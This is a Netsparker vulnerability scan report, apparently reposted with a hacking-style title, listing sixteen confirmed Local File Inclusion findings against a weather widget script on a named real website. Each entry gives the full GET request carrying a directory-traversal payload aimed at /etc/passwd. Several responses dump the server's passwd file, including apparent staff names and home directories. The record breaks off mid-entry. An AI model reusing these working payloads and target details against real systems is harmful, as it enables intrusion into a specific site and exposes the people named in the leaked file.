LFI, XSS, DORK, GHDB ibegin.com REPORT SUMMARY

Netsparker - Scan Report Summary
TARGET URL: http://www.ibegin.com/weather/weather_widget....
SCAN DATE: 5/2/2011 10:39:24 AM
REPORT DATE: 5/2/2011 12:11:13 PM
SCAN DURATION: 00:01:38

Total Requests
Average Speed req/sec.
19 identified
16 confirmed
0 critical
1 informational

DORK TESTS

PROFILE: Previous Settings
ENABLED ENGINES: Static Tests, Find Backup Files, Blind Command Injection, Blind SQL Injection, Boolean SQL Injection, Command Injection, HTTP Header Injection, Local File Inclusion, Open Redirection, Remote Code Evaluation, Remote File Inclusion, SQL Injection, Cross-site Scripting
Authentication
Scheduled

VULNERABILITIES

IMPORTANT: 84 %
LOW: 11 %
INFORMATION: 5 %

VULNERABILITY SUMMARY

| URL | Parameter | Method | Vulnerability | Confirmed |
|---|---|---|---|---|
| /weather/weather_widget.php | type | GET | Local File Inclusion | Yes |
| | country | GET | Local File Inclusion | Yes |
| | state | GET | Local File Inclusion | Yes |
| | city | GET | Local File Inclusion | Yes |
| | smallicon | GET | Local File Inclusion | Yes |
| | current | GET | Local File Inclusion | Yes |
| | forecast | GET | Local File Inclusion | Yes |
| | background_color | GET | Local File Inclusion | Yes |
| | color | GET | Local File Inclusion | Yes |
| | width | GET | Local File Inclusion | Yes |
| | padding | GET | Local File Inclusion | Yes |
| | border_width | GET | Local File Inclusion | Yes |
| | border_color | GET | Local File Inclusion | Yes |
| | font_size | GET | Local File Inclusion | Yes |
| | font_family | GET | Local File Inclusion | Yes |
| | showicons | GET | Local File Inclusion | Yes |
| | | | Apache Version Disclosure | No |
| | | | PHP Version Disclosure | No |
| | | | [Possible] Internal Path Leakage (*nix) | No |

Local File Inclusion

16 TOTAL
IMPORTANT
CONFIRMED: 16
A Local File Inclusion (LFI) vulnerability occurs when a file from the target system is injected into the attacked server page. Netsparker confirmed this issue by reading some files from the target web server.

Impact

Impact can differ based on the exploitation and the read permission of the web server user. Depending on these factors an attacker might carry out one or more of the following attacks:

Remedy

- /weather/weather_widget.php

/weather/weather_widget.php CONFIRMED

http://www.ibegin.com/weather/weather_widget.php?type=../../../../../../../../../../../etc/passwd%00..

Parameters

Parameter Type Value
type GET ../../../../../../../../../../../etc/passwd%00weather_widget.php
country GET us
state GET Virginia
city GET Reston
smallicon GET 1
current GET 1
forecast GET 1
background_color GET ffffffffffff
color GET 000000
width GET 175
padding GET 10
border_width GET 1
border_color GET 000000
font_size GET 11
font_family GET Verdana
showicons GET 1

Request

GET /weather/weather_widget.php?type=../../../../../../../../../../../etc/passwd%00weather_widget.php&country=us&state=Virginia&city=Reston&smallicon=1&current=1&forecast=1&background_color=ffffffffffff&color=000000&width=175&padding=10&border_width=1&border_color=000000&font_size=11&font_family=Verdana&showicons=1 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.ibegin.com
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 10:39:28 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 568
Content-Type: text/html


Notice: Undefined index: old in /home/ibegin.com/public_html/weather/weather_widget.php on line 24
Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64
Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64
- /weather/weather_widget.php

/weather/weather_widget.php CONFIRMED

http://www.ibegin.com/weather/weather_widget.php?type=js&country=../../../../../../../../../../../et..

Parameters

Parameter Type Value
type GET js
country GET ../../../../../../../../../../../etc/passwd%00weather_widget.php
state GET Virginia
city GET Reston
smallicon GET 1
current GET 1
forecast GET 1
background_color GET ffffffffffff
color GET 000000
width GET 175
padding GET 10
border_width GET 1
border_color GET 000000
font_size GET 11
font_family GET Verdana
showicons GET 1

Request

GET /weather/weather_widget.php?type=js&country=../../../../../../../../../../../etc/passwd%00weather_widget.php&state=Virginia&city=Reston&smallicon=1&current=1&forecast=1&background_color=ffffffffffff&color=000000&width=175&padding=10&border_width=1&border_color=000000&font_size=11&font_family=Verdana&showicons=1 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.ibegin.com
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 10:39:29 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 568
Content-Type: text/html


Notice: Undefined index: old in /home/ibegin.com/public_html/weather/weather_widget.php on line 24
Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64
Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64
- /weather/weather_widget.php

/weather/weather_widget.php CONFIRMED

http://www.ibegin.com/weather/weather_widget.php?type=js&country=us&state=../../../../../../../../....

Parameters

Parameter Type Value
type GET js
country GET us
state GET ../../../../../../../../../../../etc/passwd%00weather_widget.php
city GET Reston
smallicon GET 1
current GET 1
forecast GET 1
background_color GET ffffffffffff
color GET 000000
width GET 175
padding GET 10
border_width GET 1
border_color GET 000000
font_size GET 11
font_family GET Verdana
showicons GET 1

Request

GET /weather/weather_widget.php?type=js&country=us&state=../../../../../../../../../../../etc/passwd%00weather_widget.php&city=Reston&smallicon=1&current=1&forecast=1&background_color=ffffffffffff&color=000000&width=175&padding=10&border_width=1&border_color=000000&font_size=11&font_family=Verdana&showicons=1 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.ibegin.com
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 10:39:30 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 568
Content-Type: text/html


Notice: Undefined index: old in /home/ibegin.com/public_html/weather/weather_widget.php on line 24
Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64
Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64
- /weather/weather_widget.php

/weather/weather_widget.php CONFIRMED

http://www.ibegin.com/weather/weather_widget.php?type=js&country=us&state=Virginia&city=../../../../..

Parameters

Parameter Type Value
type GET js
country GET us
state GET Virginia
city GET ../../../../../../../../../../../etc/passwd%00weather_widget.php
smallicon GET 1
current GET 1
forecast GET 1
background_color GET ffffffffffff
color GET 000000
width GET 175
padding GET 10
border_width GET 1
border_color GET 000000
font_size GET 11
font_family GET Verdana
showicons GET 1

Request

GET /weather/weather_widget.php?type=js&country=us&state=Virginia&city=../../../../../../../../../../../etc/passwd%00weather_widget.php&smallicon=1&current=1&forecast=1&background_color=ffffffffffff&color=000000&width=175&padding=10&border_width=1&border_color=000000&font_size=11&font_family=Verdana&showicons=1 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.ibegin.com
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 10:39:31 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 568
Content-Type: text/html


Notice: Undefined index: old in /home/ibegin.com/public_html/weather/weather_widget.php on line 24
Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64
Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64
- /weather/weather_widget.php

/weather/weather_widget.php CONFIRMED

http://www.ibegin.com/weather/weather_widget.php?type=js&country=us&state=Virginia&city=Reston&small..

Parameters

Parameter Type Value
type GET js
country GET us
state GET Virginia
city GET Reston
smallicon GET ../../../../../../../../../../../etc/passwd%00weather_widget.php
current GET 1
forecast GET 1
background_color GET ffffffffffff
color GET 000000
width GET 175
padding GET 10
border_width GET 1
border_color GET 000000
font_size GET 11
font_family GET Verdana
showicons GET 1

Request

GET /weather/weather_widget.php?type=js&country=us&state=Virginia&city=Reston&smallicon=../../../../../../../../../../../etc/passwd%00weather_widget.php&current=1&forecast=1&background_color=ffffffffffff&color=000000&width=175&padding=10&border_width=1&border_color=000000&font_size=11&font_family=Verdana&showicons=1 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.ibegin.com
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 10:39:32 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 568
Content-Type: text/html


Notice: Undefined index: old in /home/ibegin.com/public_html/weather/weather_widget.php on line 24
Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64
Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64
- /weather/weather_widget.php

/weather/weather_widget.php CONFIRMED

http://www.ibegin.com/weather/weather_widget.php?type=js&country=us&state=Virginia&city=Reston&small..

Parameters

Parameter Type Value
type GET js
country GET us
state GET Virginia
city GET Reston
smallicon GET 1
current GET ../../../../../../../../../../../etc/passwd%00weather_widget.php
forecast GET 1
background_color GET ffffffffffff
color GET 000000
width GET 175
padding GET 10
border_width GET 1
border_color GET 000000
font_size GET 11
font_family GET Verdana
showicons GET 1

Request

GET /weather/weather_widget.php?type=js&country=us&state=Virginia&city=Reston&smallicon=1&current=../../../../../../../../../../../etc/passwd%00weather_widget.php&forecast=1&background_color=ffffffffffff&color=000000&width=175&padding=10&border_width=1&border_color=000000&font_size=11&font_family=Verdana&showicons=1 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.ibegin.com
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 10:39:33 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 568
Content-Type: text/html


Notice: Undefined index: old in /home/ibegin.com/public_html/weather/weather_widget.php on line 24
Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64
Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64
- /weather/weather_widget.php

/weather/weather_widget.php CONFIRMED

http://www.ibegin.com/weather/weather_widget.php?type=js&country=us&state=Virginia&city=Reston&small..

Parameters

Parameter Type Value
type GET js
country GET us
state GET Virginia
city GET Reston
smallicon GET 1
current GET 1
forecast GET ../../../../../../../../../../../etc/passwd%00weather_widget.php
background_color GET ffffffffffff
color GET 000000
width GET 175
padding GET 10
border_width GET 1
border_color GET 000000
font_size GET 11
font_family GET Verdana
showicons GET 1

Request

GET /weather/weather_widget.php?type=js&country=us&state=Virginia&city=Reston&smallicon=1&current=1&forecast=../../../../../../../../../../../etc/passwd%00weather_widget.php&background_color=ffffffffffff&color=000000&width=175&padding=10&border_width=1&border_color=000000&font_size=11&font_family=Verdana&showicons=1 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.ibegin.com
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 10:39:34 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 568
Content-Type: text/html


Notice: Undefined index: old in /home/ibegin.com/public_html/weather/weather_widget.php on line 24
Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64
Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64
- /weather/weather_widget.php

/weather/weather_widget.php CONFIRMED

http://www.ibegin.com/weather/weather_widget.php?type=js&country=us&state=Virginia&city=Reston&small..

Parameters

Parameter Type Value
type GET js
country GET us
state GET Virginia
city GET Reston
smallicon GET 1
current GET 1
forecast GET 1
background_color GET ../../../../../../../../../../../etc/passwd%00weather_widget.php
color GET 000000
width GET 175
padding GET 10
border_width GET 1
border_color GET 000000
font_size GET 11
font_family GET Verdana
showicons GET 1

Request

GET /weather/weather_widget.php?type=js&country=us&state=Virginia&city=Reston&smallicon=1&current=1&forecast=1&background_color=../../../../../../../../../../../etc/passwd%00weather_widget.php&color=000000&width=175&padding=10&border_width=1&border_color=000000&font_size=11&font_family=Verdana&showicons=1 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.ibegin.com
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 10:39:35 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 568
Content-Type: text/html


Notice: Undefined index: old in /home/ibegin.com/public_html/weather/weather_widget.php on line 24
Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64
Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64
- /weather/weather_widget.php

/weather/weather_widget.php CONFIRMED

http://www.ibegin.com/weather/weather_widget.php?type=js&country=us&state=Virginia&city=Reston&small..

Parameters

Parameter Type Value
type GET js
country GET us
state GET Virginia
city GET Reston
smallicon GET 1
current GET 1
forecast GET 1
background_color GET ffffffffffff
color GET ../../../../../../../../../../../etc/passwd%00weather_widget.php
width GET 175
padding GET 10
border_width GET 1
border_color GET 000000
font_size GET 11
font_family GET Verdana
showicons GET 1

Request

GET /weather/weather_widget.php?type=js&country=us&state=Virginia&city=Reston&smallicon=1&current=1&forecast=1&background_color=ffffffffffff&color=../../../../../../../../../../../etc/passwd%00weather_widget.php&width=175&padding=10&border_width=1&border_color=000000&font_size=11&font_family=Verdana&showicons=1 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.ibegin.com
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 10:39:36 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 568
Content-Type: text/html


Notice: Undefined index: old in /home/ibegin.com/public_html/weather/weather_widget.php on line 24
Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64
Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64
- /weather/weather_widget.php

/weather/weather_widget.php CONFIRMED

http://www.ibegin.com/weather/weather_widget.php?type=js&country=us&state=Virginia&city=Reston&small..

Parameters

Parameter Type Value
type GET js
country GET us
state GET Virginia
city GET Reston
smallicon GET 1
current GET 1
forecast GET 1
background_color GET ffffffffffff
color GET 000000
width GET ../../../../../../../../../../../etc/passwd%00weather_widget.php
padding GET 10
border_width GET 1
border_color GET 000000
font_size GET 11
font_family GET Verdana
showicons GET 1

Request

GET /weather/weather_widget.php?type=js&country=us&state=Virginia&city=Reston&smallicon=1&current=1&forecast=1&background_color=ffffffffffff&color=000000&width=../../../../../../../../../../../etc/passwd%00weather_widget.php&padding=10&border_width=1&border_color=000000&font_size=11&font_family=Verdana&showicons=1 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.ibegin.com
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 10:39:37 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 568
Content-Type: text/html


Notice: Undefined index: old in /home/ibegin.com/public_html/weather/weather_widget.php on line 24
Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64
Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64
- /weather/weather_widget.php

/weather/weather_widget.php CONFIRMED

http://www.ibegin.com/weather/weather_widget.php?type=js&country=us&state=Virginia&city=Reston&small..

Parameters

Parameter Type Value
type GET js
country GET us
state GET Virginia
city GET Reston
smallicon GET 1
current GET 1
forecast GET 1
background_color GET ffffffffffff
color GET 000000
width GET 175
padding GET ../../../../../../../../../../../etc/passwd%00weather_widget.php
border_width GET 1
border_color GET 000000
font_size GET 11
font_family GET Verdana
showicons GET 1

Request

GET /weather/weather_widget.php?type=js&country=us&state=Virginia&city=Reston&smallicon=1&current=1&forecast=1&background_color=ffffffffffff&color=000000&width=175&padding=../../../../../../../../../../../etc/passwd%00weather_widget.php&border_width=1&border_color=000000&font_size=11&font_family=Verdana&showicons=1 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.ibegin.com
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 10:39:38 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 568
Content-Type: text/html


Notice: Undefined index: old in /home/ibegin.com/public_html/weather/weather_widget.php on line 24
Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64
Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64
- /weather/weather_widget.php

/weather/weather_widget.php CONFIRMED

http://www.ibegin.com/weather/weather_widget.php?type=js&country=us&state=Virginia&city=Reston&small..

Parameters

Parameter Type Value
type GET js
country GET us
state GET Virginia
city GET Reston
smallicon GET 1
current GET 1
forecast GET 1
background_color GET ffffffffffff
color GET 000000
width GET 175
padding GET 10
border_width GET ../../../../../../../../../../../etc/passwd%00weather_widget.php
border_color GET 000000
font_size GET 11
font_family GET Verdana
showicons GET 1

Request

GET /weather/weather_widget.php?type=js&country=us&state=Virginia&city=Reston&smallicon=1&current=1&forecast=1&background_color=ffffffffffff&color=000000&width=175&padding=10&border_width=../../../../../../../../../../../etc/passwd%00weather_widget.php&border_color=000000&font_size=11&font_family=Verdana&showicons=1 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.ibegin.com
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 10:39:39 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 568
Content-Type: text/html


Notice: Undefined index: old in /home/ibegin.com/public_html/weather/weather_widget.php on line 24Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64root:x:0:0:root:/root:/bin/bashdaemon:x:1:1:daemon:/usr/sbin:/bin/shbin:x:2:2:bin:/bin:/bin/shsys:x:3:3:sys:/dev:/bin/shsync:x:4:65534:sync:/bin:/bin/syncgames:x:5:60:games:/usr/games:/bin/shman:x:6:12:man:/var/cache/man:/bin/shlp:x:7:7:lp:/var/spool/lpd:/bin/shmail:x:8:8:mail:/var/mail:/bin/shnews:x:9:9:news:/var/spool/news:/bin/shuucp:x:10:10:uucp:/var/spool/uucp:/bin/shproxy:x:13:13:proxy:/bin:/bin/shwww-data:x:33:33:www-data:/var/www:/bin/shbackup:x:34:34:backup:/var/backups:/bin/shlist:x:38:38:Mailing List Manager:/var/list:/bin/shirc:x:39:39:ircd:/var/run/ircd:/bin/shgnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/shnobody:x:65534:65534:nobody:/nonexistent:/bin/shlibuuid:x:100:101::/var/lib/libuuid:/bin/shsyslog:x:101:103::/home/syslog:/bin/falsesshd:x:102:65534::/var/run/sshd:/usr/sbin/nologinjphilp:x:1000:1000:Jason Philp,,,:/home/jphilp:/bin/bashafarooq:x:1001:1001:Ahmed Farooq,,,:/home/afarooq:/bin/bashpostfix:x:103:106::/var/spool/postfix:/bin/falsedealwatch:x:1002:1003:,,,:/home/dealwatch:/bin/bash
- /weather/weather_widget.php

/weather/weather_widget.php CONFIRMED

http://www.ibegin.com/weather/weather_widget.php?type=js&country=us&state=Virginia&city=Reston&small..

Parameters

Parameter Type Value
type GET js
country GET us
state GET Virginia
city GET Reston
smallicon GET 1
current GET 1
forecast GET 1
background_color GET ffffffffffff
color GET 000000
width GET 175
padding GET 10
border_width GET 1
border_color GET ../../../../../../../../../../../etc/passwdweather_widget.php
font_size GET 11
font_family GET Verdana
showicons GET 1

Request

GET /weather/weather_widget.php?type=js&country=us&state=Virginia&city=Reston&smallicon=1&current=1&forecast=1&background_color=ffffffffffff&color=000000&width=175&padding=10&border_width=1&border_color=../../../../../../../../../../../etc/passwd%00weather_widget.php&font_size=11&font_family=Verdana&showicons=1 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.ibegin.com
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 10:39:40 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 568
Content-Type: text/html


Notice: Undefined index: old in /home/ibegin.com/public_html/weather/weather_widget.php on line 24Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64root:x:0:0:root:/root:/bin/bashdaemon:x:1:1:daemon:/usr/sbin:/bin/shbin:x:2:2:bin:/bin:/bin/shsys:x:3:3:sys:/dev:/bin/shsync:x:4:65534:sync:/bin:/bin/syncgames:x:5:60:games:/usr/games:/bin/shman:x:6:12:man:/var/cache/man:/bin/shlp:x:7:7:lp:/var/spool/lpd:/bin/shmail:x:8:8:mail:/var/mail:/bin/shnews:x:9:9:news:/var/spool/news:/bin/shuucp:x:10:10:uucp:/var/spool/uucp:/bin/shproxy:x:13:13:proxy:/bin:/bin/shwww-data:x:33:33:www-data:/var/www:/bin/shbackup:x:34:34:backup:/var/backups:/bin/shlist:x:38:38:Mailing List Manager:/var/list:/bin/shirc:x:39:39:ircd:/var/run/ircd:/bin/shgnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/shnobody:x:65534:65534:nobody:/nonexistent:/bin/shlibuuid:x:100:101::/var/lib/libuuid:/bin/shsyslog:x:101:103::/home/syslog:/bin/falsesshd:x:102:65534::/var/run/sshd:/usr/sbin/nologinjphilp:x:1000:1000:Jason Philp,,,:/home/jphilp:/bin/bashafarooq:x:1001:1001:Ahmed Farooq,,,:/home/afarooq:/bin/bashpostfix:x:103:106::/var/spool/postfix:/bin/falsedealwatch:x:1002:1003:,,,:/home/dealwatch:/bin/bash
- /weather/weather_widget.php

/weather/weather_widget.php CONFIRMED

http://www.ibegin.com/weather/weather_widget.php?type=js&country=us&state=Virginia&city=Reston&small..

Parameters

Parameter Type Value
type GET js
country GET us
state GET Virginia
city GET Reston
smallicon GET 1
current GET 1
forecast GET 1
background_color GET ffffffffffff
color GET 000000
width GET 175
padding GET 10
border_width GET 1
border_color GET 000000
font_size GET ../../../../../../../../../../../etc/passwdweather_widget.php
font_family GET Verdana
showicons GET 1

Request

GET /weather/weather_widget.php?type=js&country=us&state=Virginia&city=Reston&smallicon=1&current=1&forecast=1&background_color=ffffffffffff&color=000000&width=175&padding=10&border_width=1&border_color=000000&font_size=../../../../../../../../../../../etc/passwd%00weather_widget.php&font_family=Verdana&showicons=1 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.ibegin.com
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 10:39:41 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 568
Content-Type: text/html


Notice: Undefined index: old in /home/ibegin.com/public_html/weather/weather_widget.php on line 24Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64root:x:0:0:root:/root:/bin/bashdaemon:x:1:1:daemon:/usr/sbin:/bin/shbin:x:2:2:bin:/bin:/bin/shsys:x:3:3:sys:/dev:/bin/shsync:x:4:65534:sync:/bin:/bin/syncgames:x:5:60:games:/usr/games:/bin/shman:x:6:12:man:/var/cache/man:/bin/shlp:x:7:7:lp:/var/spool/lpd:/bin/shmail:x:8:8:mail:/var/mail:/bin/shnews:x:9:9:news:/var/spool/news:/bin/shuucp:x:10:10:uucp:/var/spool/uucp:/bin/shproxy:x:13:13:proxy:/bin:/bin/shwww-data:x:33:33:www-data:/var/www:/bin/shbackup:x:34:34:backup:/var/backups:/bin/shlist:x:38:38:Mailing List Manager:/var/list:/bin/shirc:x:39:39:ircd:/var/run/ircd:/bin/shgnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/shnobody:x:65534:65534:nobody:/nonexistent:/bin/shlibuuid:x:100:101::/var/lib/libuuid:/bin/shsyslog:x:101:103::/home/syslog:/bin/falsesshd:x:102:65534::/var/run/sshd:/usr/sbin/nologinjphilp:x:1000:1000:Jason Philp,,,:/home/jphilp:/bin/bashafarooq:x:1001:1001:Ahmed Farooq,,,:/home/afarooq:/bin/bashpostfix:x:103:106::/var/spool/postfix:/bin/falsedealwatch:x:1002:1003:,,,:/home/dealwatch:/bin/bash
- /weather/weather_widget.php

/weather/weather_widget.php CONFIRMED

http://www.ibegin.com/weather/weather_widget.php?type=js&country=us&state=Virginia&city=Reston&small..

Parameters

Parameter Type Value
type GET js
country GET us
state GET Virginia
city GET Reston
smallicon GET 1
current GET 1
forecast GET 1
background_color GET ffffffffffff
color GET 000000
width GET 175
padding GET 10
border_width GET 1
border_color GET 000000
font_size GET 11
font_family GET ../../../../../../../../../../../etc/passwdweather_widget.php
showicons GET 1

Request

GET /weather/weather_widget.php?type=js&country=us&state=Virginia&city=Reston&smallicon=1&current=1&forecast=1&background_color=ffffffffffff&color=000000&width=175&padding=10&border_width=1&border_color=000000&font_size=11&font_family=../../../../../../../../../../../etc/passwd%00weather_widget.php&showicons=1 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.ibegin.com
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 10:39:42 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 568
Content-Type: text/html


Notice: Undefined index: old in /home/ibegin.com/public_html/weather/weather_widget.php on line 24Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64root:x:0:0:root:/root:/bin/bashdaemon:x:1:1:daemon:/usr/sbin:/bin/shbin:x:2:2:bin:/bin:/bin/shsys:x:3:3:sys:/dev:/bin/shsync:x:4:65534:sync:/bin:/bin/syncgames:x:5:60:games:/usr/games:/bin/shman:x:6:12:man:/var/cache/man:/bin/shlp:x:7:7:lp:/var/spool/lpd:/bin/shmail:x:8:8:mail:/var/mail:/bin/shnews:x:9:9:news:/var/spool/news:/bin/shuucp:x:10:10:uucp:/var/spool/uucp:/bin/shproxy:x:13:13:proxy:/bin:/bin/shwww-data:x:33:33:www-data:/var/www:/bin/shbackup:x:34:34:backup:/var/backups:/bin/shlist:x:38:38:Mailing List Manager:/var/list:/bin/shirc:x:39:39:ircd:/var/run/ircd:/bin/shgnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/shnobody:x:65534:65534:nobody:/nonexistent:/bin/shlibuuid:x:100:101::/var/lib/libuuid:/bin/shsyslog:x:101:103::/home/syslog:/bin/falsesshd:x:102:65534::/var/run/sshd:/usr/sbin/nologinjphilp:x:1000:1000:Jason Philp,,,:/home/jphilp:/bin/bashafarooq:x:1001:1001:Ahmed Farooq,,,:/home/afarooq:/bin/bashpostfix:x:103:106::/var/spool/postfix:/bin/falsedealwatch:x:1002:1003:,,,:/home/dealwatch:/bin/bash
- /weather/weather_widget.php

/weather/weather_widget.php CONFIRMED

http://www.ibegin.com/weather/weather_widget.php?type=js&country=us&state=Virginia&city=Reston&small..

Parameters

Parameter Type Value
type GET js
